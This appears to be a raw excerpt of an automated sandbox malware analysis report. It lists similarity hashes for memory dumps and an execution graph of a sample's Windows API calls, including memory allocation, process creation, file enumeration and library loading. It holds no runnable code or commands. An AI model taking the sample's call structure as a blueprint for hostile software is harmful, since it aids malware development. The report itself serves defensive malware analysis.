                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .$P$e$i$m$o$r$x
                                                                                                        • API String ID: 0-620024284
                                                                                                        • Opcode ID: 57e14e25f22bb0138a1ade6c18252fa20fb0293237f0419bcded68fb04a86786
                                                                                                        • Instruction ID: bc7dc5aca0597499a5fb63e01b44ecf529115cae4c17cb7ed5fe89448e92809c
                                                                                                        • Opcode Fuzzy Hash: 57e14e25f22bb0138a1ade6c18252fa20fb0293237f0419bcded68fb04a86786
                                                                                                        • Instruction Fuzzy Hash: 834177B5810218BAEB21EBA0DC40FEEB37CAF54704F409599A90DA7150EBB5774D8FA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @4>J$L$S$\$a$c$e$l
                                                                                                        • API String ID: 0-4139028360
                                                                                                        • Opcode ID: 1bb108f134bd4b877417346d2a4bbb4046abb4cefc92c583ac55de1a1dbe14bc
                                                                                                        • Instruction ID: e8912488582eb06114dcbe52e912f9237af762980cb9f16131485f2239f6f0c5
                                                                                                        • Opcode Fuzzy Hash: 1bb108f134bd4b877417346d2a4bbb4046abb4cefc92c583ac55de1a1dbe14bc
                                                                                                        • Instruction Fuzzy Hash: AC41B4B2C00218ABDB10DFA4DC84EEFF7F8AF88304F0155AADD19A7250E77469498F94
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 5$E$P$Q$S$p$z
                                                                                                        • API String ID: 0-3160930913
                                                                                                        • Opcode ID: 909bf1ca9c5ed29cc678ffba058be63360535bee55ab856c43c7ee92cc0665c1
                                                                                                        • Instruction ID: 0358770f0d0babcb108675bb2597cb944a97d4e539c34cce0024ae5c03dd07b8
                                                                                                        • Opcode Fuzzy Hash: 909bf1ca9c5ed29cc678ffba058be63360535bee55ab856c43c7ee92cc0665c1
                                                                                                        • Instruction Fuzzy Hash: 3811CC50D0C7CED9DB12CABC88147AEBF715B12225F0882C9D4B46A2D2C2795705D7A6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@4>J$i$l$o$u
                                                                                                        • API String ID: 0-3841981591
                                                                                                        • Opcode ID: bcb5eb58d68defbfd19187bba7eff1f0039ca7eb85f6b886f0954b24bc5ec0cb
                                                                                                        • Instruction ID: 0533c417330472dff5e4881def839985c5b8f27d992fd14e5d7f53885f1c6925
                                                                                                        • Opcode Fuzzy Hash: bcb5eb58d68defbfd19187bba7eff1f0039ca7eb85f6b886f0954b24bc5ec0cb
                                                                                                        • Instruction Fuzzy Hash: EE612AB2900304AFDB24DFA4DC84FEFB7FDAF88714F104559E51AA7240E635BA458B61
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: F$P$T$f$r$x
                                                                                                        • API String ID: 0-2523166886
                                                                                                        • Opcode ID: 589958f89bf5aebb17f6715e72a039915e43ca1d2bdb5297ef2a9d05c3af6e73
                                                                                                        • Instruction ID: 88848ce4ca58ad4f9d56237eecd21ab6f8b2f3c46acff441a157f4ab034216a6
                                                                                                        • Opcode Fuzzy Hash: 589958f89bf5aebb17f6715e72a039915e43ca1d2bdb5297ef2a9d05c3af6e73
                                                                                                        • Instruction Fuzzy Hash: 2851C371940304AAEB34EFA4CD44BEEF7F8EF44714F04961AE85966190E7B4B688CF91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@4>J$i$l$o$u
                                                                                                        • API String ID: 0-3841981591
                                                                                                        • Opcode ID: 53e6c6ded5511c50a41b5d1e63b2d9490fd63a3ce70c983be3c38ffc9a8453aa
                                                                                                        • Instruction ID: 29a8e95b9b81e24d445fdc5d38254a942f50abbf96bc524de0608994c8094b33
                                                                                                        • Opcode Fuzzy Hash: 53e6c6ded5511c50a41b5d1e63b2d9490fd63a3ce70c983be3c38ffc9a8453aa
                                                                                                        • Instruction Fuzzy Hash: 1D41E8B1900208AFDB20DFA4CC84FEFBBF9AF89704F105559E519A7240E775BA45CB60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@4>J$e$k$o
                                                                                                        • API String ID: 0-1109533214
                                                                                                        • Opcode ID: d605fc70738ad968026ddd5f8b020264fe063352ea7f2e506d300757c0f6e509
                                                                                                        • Instruction ID: 6c695d87f7d445ec597cd8969b5214923d1847846af47567f4c0d4d13ffdd4ab
                                                                                                        • Opcode Fuzzy Hash: d605fc70738ad968026ddd5f8b020264fe063352ea7f2e506d300757c0f6e509
                                                                                                        • Instruction Fuzzy Hash: 3AB1DAB5A00708AFDB14DBA4CC85FEFB7F9AF88704F108558F619A7280D675BA41CB60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@4>J$e$k$o
                                                                                                        • API String ID: 0-1109533214
                                                                                                        • Opcode ID: db0fde729472821e25c73378dc42d1e547ea74859b6ae7ed80120b8fe6d65ff0
                                                                                                        • Instruction ID: 368ce7aa992a2eeffecf4ae994b61a58c4099ec17ee00aae5ca83bbc94f9adf4
                                                                                                        • Opcode Fuzzy Hash: db0fde729472821e25c73378dc42d1e547ea74859b6ae7ed80120b8fe6d65ff0
                                                                                                        • Instruction Fuzzy Hash: 216109B5A00308ABDB14DFA4CC85FEFB7F9AF89704F108558A619A7284D635BA41CB60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $e$h$o
                                                                                                        • API String ID: 0-3662636641
                                                                                                        • Opcode ID: 071afabe2d07ab0009ed7f395c03dacbb9fdda3f94e83c7dfc4124618013772d
                                                                                                        • Instruction ID: a6a6260bfadaff8925f24a561eafb50d49fffce66adf178c113dd24acf0f0974
                                                                                                        • Opcode Fuzzy Hash: 071afabe2d07ab0009ed7f395c03dacbb9fdda3f94e83c7dfc4124618013772d
                                                                                                        • Instruction Fuzzy Hash: A48157B2811218AAEB15EB90CC85FFEB3BCFF48704F04559DE90966050EB747B498FA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                        • API String ID: 0-2877786613
                                                                                                        • Opcode ID: b70de346f3ddfdfce1f30f476508783d599abcad3cdf8b12e6471ced7a916e3b
                                                                                                        • Instruction ID: 5ba5777f24d55566bae28efc6c98ca8f4ac132dc9f924b43ae2bca9bfafe6e53
                                                                                                        • Opcode Fuzzy Hash: b70de346f3ddfdfce1f30f476508783d599abcad3cdf8b12e6471ced7a916e3b
                                                                                                        • Instruction Fuzzy Hash: 83415EB19512587AFB11EB90CC42FFFB77C9F99604F445048FA04BA190E7747A0587B6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                        • API String ID: 0-2877786613
                                                                                                        • Opcode ID: 6629f6fd439b712446763bc9ca6facec1438b47a28440dfdd1732f4ff11b030f
                                                                                                        • Instruction ID: c5f93e884f29f8dd6f439e544583c1d79fb1cf86677fe4402e754f307aab21f0
                                                                                                        • Opcode Fuzzy Hash: 6629f6fd439b712446763bc9ca6facec1438b47a28440dfdd1732f4ff11b030f
                                                                                                        • Instruction Fuzzy Hash: F3417CB1941258BAFB12EB90CC42FFFB77CAF59604F045048FA04BA190E7747A0587A6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $e$h$o
                                                                                                        • API String ID: 0-3662636641
                                                                                                        • Opcode ID: 5c56e00b66ca38306db08efe726be8318160660c7ba61c8fe8604cc7022638af
                                                                                                        • Instruction ID: 97bac67c80abf63c168a48f17339829b42a3965dec208f58da0792ac8cf1ac75
                                                                                                        • Opcode Fuzzy Hash: 5c56e00b66ca38306db08efe726be8318160660c7ba61c8fe8604cc7022638af
                                                                                                        • Instruction Fuzzy Hash: 85414FB1C01318AAEB54EB64CC45FEEB7B8AF48704F005599A90DA6150EB747B88CFE1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6$E$K$O
                                                                                                        • API String ID: 0-518338784
                                                                                                        • Opcode ID: 32523632112b71f5b9eec982eb7e2ff236425c52670c2b4530235bcd6c6f8ffa
                                                                                                        • Instruction ID: 77e708c417a584cadbb381e450d2df170ab193e6fd5bb38429dc7e2203014e6c
                                                                                                        • Opcode Fuzzy Hash: 32523632112b71f5b9eec982eb7e2ff236425c52670c2b4530235bcd6c6f8ffa
                                                                                                        • Instruction Fuzzy Hash: 0A312FB1E10219BBEB14DBA4CD41FFEB7B8EF49308F005158E908A7240E775BA448BA5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $e$k$o
                                                                                                        • API String ID: 0-3624523832
                                                                                                        • Opcode ID: 01bec89ec8cd4f423dff1a4955b8aa6b285fa399f03acca8fd7df01d4bbffd7d
                                                                                                        • Instruction ID: de1ba7bd08cbc352b924a45d2a12efab881d2f3313eaadc8d126d1f1b250a969
                                                                                                        • Opcode Fuzzy Hash: 01bec89ec8cd4f423dff1a4955b8aa6b285fa399f03acca8fd7df01d4bbffd7d
                                                                                                        • Instruction Fuzzy Hash: 1411A9B2900218ABDB14DFD8D8C4AEEF7B5FF08304F048219E9199B215E771E549CBA0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $e$k$o
                                                                                                        • API String ID: 0-3624523832
                                                                                                        • Opcode ID: f78bdf9a71d80c7e8009ffa7a4cf0da75cccca17a84467da5b9d6f7085b5ce9b
                                                                                                        • Instruction ID: ee21bdedb79ed9b8bd7067e379dc82370648c7a06605cecfb8d4c68e5c7dd7a8
                                                                                                        • Opcode Fuzzy Hash: f78bdf9a71d80c7e8009ffa7a4cf0da75cccca17a84467da5b9d6f7085b5ce9b
                                                                                                        • Instruction Fuzzy Hash: BB0184B2900218ABDB14DF98D884EDEF7B9FF48314F049259E9196B205E771B549CBA0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: I$g|$r8ty$r8tyg|
                                                                                                        • API String ID: 0-745488224
                                                                                                        • Opcode ID: f2ec19e73ae3643ce71873b1a0c3b6d565fa315b85ecc899d9f2fd1911051c5c
                                                                                                        • Instruction ID: 4ec95d19d8640d284d84847cb78bbf036eb9626ad1f54a967a971d4dcc969a35
                                                                                                        • Opcode Fuzzy Hash: f2ec19e73ae3643ce71873b1a0c3b6d565fa315b85ecc899d9f2fd1911051c5c
                                                                                                        • Instruction Fuzzy Hash: 96E092B580024C6ADB00EFE4C841AAEBB38EF00240F209D98C9549B261D7719605C79A

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.5%
                                                                                                        Dynamic/Decrypted Code Coverage:4.2%
                                                                                                        Signature Coverage:1.6%
                                                                                                        Total number of Nodes:450
                                                                                                        Total number of Limit Nodes:77
                                                                                                        execution_graph 98476 3209d60 98477 3209d6f 98476->98477 98478 3209db0 98477->98478 98479 3209d9d CreateThread 98477->98479 98480 320b360 98483 322b270 98480->98483 98482 320c9d1 98486 3229320 98483->98486 98485 322b2a1 98485->98482 98487 32293b8 98486->98487 98489 322934e 98486->98489 98488 32293ce NtAllocateVirtualMemory 98487->98488 98488->98485 98489->98485 98280 32120a0 98285 3228820 98280->98285 98284 32120eb 98286 322883d 98285->98286 98294 5292c0a 98286->98294 98287 32120d6 98289 3229250 98287->98289 98290 32292df 98289->98290 98292 322927b 98289->98292 98297 5292e80 LdrInitializeThunk 98290->98297 98291 3229310 98291->98284 98292->98284 98295 5292c1f LdrInitializeThunk 98294->98295 98296 5292c11 98294->98296 98295->98287 98296->98287 98297->98291 98490 3215960 98491 3217e90 LdrInitializeThunk 98490->98491 98492 3215990 98491->98492 98494 32159bc 98492->98494 98495 3217e10 98492->98495 98496 3217e54 98495->98496 98501 3217e75 98496->98501 98502 32284f0 98496->98502 98498 3217e65 98499 3217e81 98498->98499 98500 32291c0 NtClose 98498->98500 98499->98492 98500->98501 98501->98492 98503 3228570 98502->98503 98504 322851e 98502->98504 98507 5294650 LdrInitializeThunk 98503->98507 98504->98498 98505 3228595 98505->98498 98507->98505 98298 3229120 98299 322914b 98298->98299 98300 3229197 98298->98300 98301 32291ad NtDeleteFile 98300->98301 98508 3221560 98509 322157c 98508->98509 98510 32215a4 98509->98510 98511 32215b8 98509->98511 98512 32291c0 NtClose 98510->98512 98513 32291c0 NtClose 98511->98513 98514 32215ad 98512->98514 98515 32215c1 98513->98515 98518 322b420 RtlAllocateHeap 98515->98518 98517 32215cc 98518->98517 98524 32159e4 98525 32159ec 98524->98525 98526 3215990 98524->98526 98527 3217e10 2 API calls 98526->98527 98528 32159bc 98526->98528 98527->98526 98531 321256a 98532 3212579 98531->98532 98533 32125a3 98532->98533 98534 3216080 2 API calls 98532->98534 98534->98533 98302 32199af 98303 32199c6 98302->98303 98305 32199cb 98302->98305 98304 32199fd 98305->98304 98307 322b300 98305->98307 98310 3229540 98307->98310 98309 322b319 98309->98304 98311 322955a 98310->98311 98312 322956b RtlFreeHeap 98311->98312 98312->98309 98313 32185b1 98314 32185c1 98313->98314 98316 3218571 98314->98316 98317 3216e70 98314->98317 98318 3216e86 98317->98318 98320 3216ebf 98317->98320 98318->98320 98321 3216ce0 LdrLoadDll 98318->98321 98320->98316 98321->98320 98322 321c3b0 98323 321c3d9 98322->98323 98324 321c4dd 98323->98324 98325 321c483 FindFirstFileW 98323->98325 98325->98324 98327 321c49e 98325->98327 98326 321c4c4 FindNextFileW 98326->98327 98328 321c4d6 FindClose 98326->98328 98327->98326 98328->98324 98535 321aaf0 98540 321a800 98535->98540 98537 321aafd 98554 321a470 98537->98554 98539 321ab19 98541 321a825 98540->98541 98565 3218100 98541->98565 98544 321a970 98544->98537 98546 321a987 98546->98537 98547 321a97e 98547->98546 98549 321aa75 98547->98549 98584 3219ec0 98547->98584 98551 321aada 98549->98551 98593 321a230 98549->98593 98552 322b300 RtlFreeHeap 98551->98552 98553 321aae1 98552->98553 98553->98537 98555 321a486 98554->98555 98562 321a491 98554->98562 98556 322b3e0 RtlAllocateHeap 98555->98556 98556->98562 98557 321a4b8 98557->98539 98558 3218100 GetFileAttributesW 98558->98562 98559 321a7d2 98560 321a7eb 98559->98560 98561 322b300 RtlFreeHeap 98559->98561 98560->98539 98561->98560 98562->98557 98562->98558 98562->98559 98563 3219ec0 RtlFreeHeap 98562->98563 98564 321a230 RtlFreeHeap 98562->98564 98563->98562 98564->98562 98566 3218121 98565->98566 98567 3218128 GetFileAttributesW 98566->98567 98568 3218133 98566->98568 98567->98568 98568->98544 98569 3223190 98568->98569 98570 322319e 98569->98570 98571 32231a5 98569->98571 98570->98547 98572 32142f0 LdrLoadDll 98571->98572 98573 32231da 98572->98573 98574 32231e9 98573->98574 98597 3222c50 LdrLoadDll 98573->98597 98575 322b3e0 RtlAllocateHeap 98574->98575 98580 3223394 98574->98580 98577 3223202 98575->98577 98578 322338a 98577->98578 98577->98580 98581 322321e 98577->98581 98579 322b300 RtlFreeHeap 98578->98579 98578->98580 98579->98580 98580->98547 98581->98580 98582 322b300 RtlFreeHeap 98581->98582 98583 322337e 98582->98583 98583->98547 98585 3219ee6 98584->98585 98598 321d920 98585->98598 98587 3219f58 98588 321a0e0 98587->98588 98589 3219f76 98587->98589 98590 321a0c5 98588->98590 98591 3219d80 RtlFreeHeap 98588->98591 98589->98590 98603 3219d80 98589->98603 98590->98547 98591->98588 98594 321a256 98593->98594 98595 321d920 RtlFreeHeap 98594->98595 98596 321a2dd 98595->98596 98596->98549 98597->98574 98599 321d944 98598->98599 98600 321d951 98599->98600 98601 322b300 RtlFreeHeap 98599->98601 98600->98587 98602 321d994 98601->98602 98602->98587 98604 3219d9d 98603->98604 98607 321d9b0 98604->98607 98606 3219ea3 98606->98589 98608 321d9d4 98607->98608 98609 321da7e 98608->98609 98610 322b300 RtlFreeHeap 98608->98610 98609->98606 98610->98609 98611 3216ef0 98612 3216f0c 98611->98612 98615 3216f5f 98611->98615 98614 32291c0 NtClose 98612->98614 98612->98615 98613 321708b 98616 3216f27 98614->98616 98615->98613 98622 3216310 NtClose LdrInitializeThunk LdrInitializeThunk 98615->98622 98621 3216310 NtClose LdrInitializeThunk LdrInitializeThunk 98616->98621 98618 321706b 98618->98613 98623 32164e0 NtClose LdrInitializeThunk LdrInitializeThunk 98618->98623 98621->98615 98622->98618 98623->98613 98330 3229030 98331 322905b 98330->98331 98332 32290d7 98330->98332 98333 32290ed NtReadFile 98332->98333 98629 32218f0 98630 3221909 98629->98630 98631 3221951 98630->98631 98634 3221994 98630->98634 98636 3221999 98630->98636 98632 322b300 RtlFreeHeap 98631->98632 98633 3221961 98632->98633 98635 322b300 RtlFreeHeap 98634->98635 98635->98636 98638 3209dc0 98639 320a007 98638->98639 98641 320a2e8 98639->98641 98642 322af40 98639->98642 98643 322af64 98642->98643 98648 3204060 98643->98648 98645 322af83 98647 322afbc 98645->98647 98651 3225460 98645->98651 98647->98641 98655 3213010 98648->98655 98650 320406d 98650->98645 98652 32254c2 98651->98652 98654 32254cf 98652->98654 98666 32117e0 98652->98666 98654->98647 98656 321302d 98655->98656 98658 3213046 98656->98658 98659 3229c50 98656->98659 98658->98650 98661 3229c6a 98659->98661 98660 3229c99 98660->98658 98661->98660 98662 3228820 LdrInitializeThunk 98661->98662 98663 3229cf9 98662->98663 98664 322b300 RtlFreeHeap 98663->98664 98665 3229d12 98664->98665 98665->98658 98667 3211814 98666->98667 98682 3217c20 98667->98682 98669 321181c 98670 3211af7 98669->98670 98671 322b3e0 RtlAllocateHeap 98669->98671 98670->98654 98672 3211832 98671->98672 98673 322b3e0 RtlAllocateHeap 98672->98673 98674 3211843 98673->98674 98675 322b3e0 RtlAllocateHeap 98674->98675 98676 3211854 98675->98676 98680 32118eb 98676->98680 98697 32167e0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98676->98697 98678 32142f0 LdrLoadDll 98679 3211aa2 98678->98679 98693 3227da0 98679->98693 98680->98678 98683 3217c4c 98682->98683 98684 3217b10 2 API calls 98683->98684 98685 3217c6f 98684->98685 98686 3217c91 98685->98686 98689 3217c79 98685->98689 98687 3217cad 98686->98687 98691 32291c0 NtClose 98686->98691 98687->98669 98688 3217c84 98688->98669 98689->98688 98690 32291c0 NtClose 98689->98690 98690->98688 98692 3217ca3 98691->98692 98692->98669 98694 3227e01 98693->98694 98696 3227e0e 98694->98696 98698 3211b10 98694->98698 98696->98670 98697->98680 98701 3211b30 98698->98701 98714 3217ef0 98698->98714 98700 3212083 98700->98696 98701->98700 98718 3220f20 98701->98718 98704 3211d42 98726 322c4d0 98704->98726 98705 3211b8e 98705->98700 98721 322c3a0 98705->98721 98707 3217e90 LdrInitializeThunk 98710 3211da7 98707->98710 98708 3211d57 98708->98710 98732 3210640 98708->98732 98710->98700 98710->98707 98712 3210640 LdrInitializeThunk 98710->98712 98711 3217e90 LdrInitializeThunk 98713 3211ef8 98711->98713 98712->98710 98713->98710 98713->98711 98715 3217efd 98714->98715 98716 3217f25 98715->98716 98717 3217f1e SetErrorMode 98715->98717 98716->98701 98717->98716 98719 322b270 NtAllocateVirtualMemory 98718->98719 98720 3220f41 98719->98720 98720->98705 98722 322c3b0 98721->98722 98723 322c3b6 98721->98723 98722->98704 98724 322b3e0 RtlAllocateHeap 98723->98724 98725 322c3dc 98724->98725 98725->98704 98727 322c440 98726->98727 98728 322c49d 98727->98728 98729 322b3e0 RtlAllocateHeap 98727->98729 98728->98708 98730 322c47a 98729->98730 98731 322b300 RtlFreeHeap 98730->98731 98731->98728 98735 3229450 98732->98735 98736 322946d 98735->98736 98739 5292c70 LdrInitializeThunk 98736->98739 98737 3210662 98737->98713 98739->98737 98740 32170c0 98741 3217132 98740->98741 98742 32170d8 98740->98742 98742->98741 98744 321b020 98742->98744 98745 321b046 98744->98745 98746 321b27f 98745->98746 98771 32295d0 98745->98771 98746->98741 98748 321b0c2 98748->98746 98749 322c4d0 2 API calls 98748->98749 98750 321b0e1 98749->98750 98750->98746 98751 321b1b8 98750->98751 98752 3228820 LdrInitializeThunk 98750->98752 98753 32158e0 LdrInitializeThunk 98751->98753 98755 321b1d7 98751->98755 98754 321b143 98752->98754 98753->98755 98754->98751 98759 321b14c 98754->98759 98760 321b267 98755->98760 98778 3228390 98755->98778 98756 321b1a0 98757 3217e90 LdrInitializeThunk 98756->98757 98763 321b1ae 98757->98763 98758 321b17e 98783 32245e0 LdrInitializeThunk 98758->98783 98759->98746 98759->98756 98759->98758 98774 32158e0 98759->98774 98765 3217e90 LdrInitializeThunk 98760->98765 98763->98741 98767 321b275 98765->98767 98766 321b23e 98768 321b258 98766->98768 98769 3228440 LdrInitializeThunk 98766->98769 98767->98741 98770 32285a0 LdrInitializeThunk 98768->98770 98769->98768 98770->98760 98772 32295ea 98771->98772 98773 32295fb CreateProcessInternalW 98772->98773 98773->98748 98775 32158e1 98774->98775 98777 321591e 98775->98777 98784 32289f0 98775->98784 98777->98758 98779 3228410 98778->98779 98781 32283be 98778->98781 98790 52939b0 LdrInitializeThunk 98779->98790 98780 3228435 98780->98766 98781->98766 98783->98756 98785 3228aa1 98784->98785 98787 3228a1f 98784->98787 98789 5292d10 LdrInitializeThunk 98785->98789 98786 3228ae6 98786->98777 98787->98777 98789->98786 98790->98780 98334 322c400 98335 322b300 RtlFreeHeap 98334->98335 98336 322c415 98335->98336 98791 3228ec0 98792 3228f77 98791->98792 98794 3228eef 98791->98794 98793 3228f8d NtCreateFile 98792->98793 98337 3210c0b PostThreadMessageW 98338 3210c1d 98337->98338 98339 3212f0c 98344 3217b10 98339->98344 98343 3212f38 98345 3212f1c 98344->98345 98346 3217b2a 98344->98346 98345->98343 98350 32291c0 98345->98350 98353 32288c0 98346->98353 98349 32291c0 NtClose 98349->98345 98351 32291da 98350->98351 98352 32291eb NtClose 98351->98352 98352->98343 98354 32288da 98353->98354 98357 52935c0 LdrInitializeThunk 98354->98357 98355 3217bfa 98355->98349 98357->98355 98358 321ff10 98359 321ff2d 98358->98359 98362 32142f0 98359->98362 98361 321ff4b 98363 3214314 98362->98363 98364 321431b 98363->98364 98365 321435e LdrLoadDll 98363->98365 98364->98361 98365->98364 98366 321f610 98367 321f674 98366->98367 98395 3216080 98367->98395 98369 321f7ae 98370 321f7a7 98370->98369 98402 3216190 98370->98402 98372 321f953 98373 321f82a 98373->98372 98374 321f962 98373->98374 98406 321f3f0 98373->98406 98376 32291c0 NtClose 98374->98376 98377 321f96c 98376->98377 98378 321f866 98378->98374 98379 321f871 98378->98379 98415 322b3e0 98379->98415 98381 321f89a 98382 321f8a3 98381->98382 98383 321f8b9 98381->98383 98384 32291c0 NtClose 98382->98384 98418 321f2e0 CoInitialize 98383->98418 98386 321f8ad 98384->98386 98389 321f942 98390 32291c0 NtClose 98389->98390 98391 321f94c 98390->98391 98392 322b300 RtlFreeHeap 98391->98392 98392->98372 98393 321f8e5 98393->98389 98394 3228c80 LdrInitializeThunk 98393->98394 98394->98393 98396 32160b3 98395->98396 98397 32160d7 98396->98397 98426 3228d30 98396->98426 98397->98370 98399 32160fa 98399->98397 98400 32291c0 NtClose 98399->98400 98401 321617a 98400->98401 98401->98370 98403 32161b5 98402->98403 98431 3228b30 98403->98431 98407 321f40c 98406->98407 98408 32142f0 LdrLoadDll 98407->98408 98410 321f42a 98408->98410 98409 321f433 98409->98378 98410->98409 98411 32142f0 LdrLoadDll 98410->98411 98412 321f4fe 98411->98412 98413 32142f0 LdrLoadDll 98412->98413 98414 321f558 98412->98414 98413->98414 98414->98378 98436 32294f0 98415->98436 98417 322b3fb 98417->98381 98421 321f345 98418->98421 98419 321f3db CoUninitialize 98420 321f3ea 98419->98420 98422 3228c80 98420->98422 98421->98419 98423 3228c9d 98422->98423 98439 5292ba0 LdrInitializeThunk 98423->98439 98424 3228ccd 98424->98393 98427 3228d4a 98426->98427 98430 5292ca0 LdrInitializeThunk 98427->98430 98428 3228d76 98428->98399 98430->98428 98432 3228b4a 98431->98432 98435 5292c60 LdrInitializeThunk 98432->98435 98433 3216229 98433->98373 98435->98433 98437 322950d 98436->98437 98438 322951e RtlAllocateHeap 98437->98438 98438->98417 98439->98424 98795 3216b50 98796 3216b7a 98795->98796 98799 3217cc0 98796->98799 98798 3216ba4 98800 3217cdd 98799->98800 98806 3228910 98800->98806 98802 3217d2d 98803 3217d34 98802->98803 98804 32289f0 LdrInitializeThunk 98802->98804 98803->98798 98805 3217d5d 98804->98805 98805->98798 98807 32289ae 98806->98807 98808 322893e 98806->98808 98811 5292f30 LdrInitializeThunk 98807->98811 98808->98802 98809 32289e7 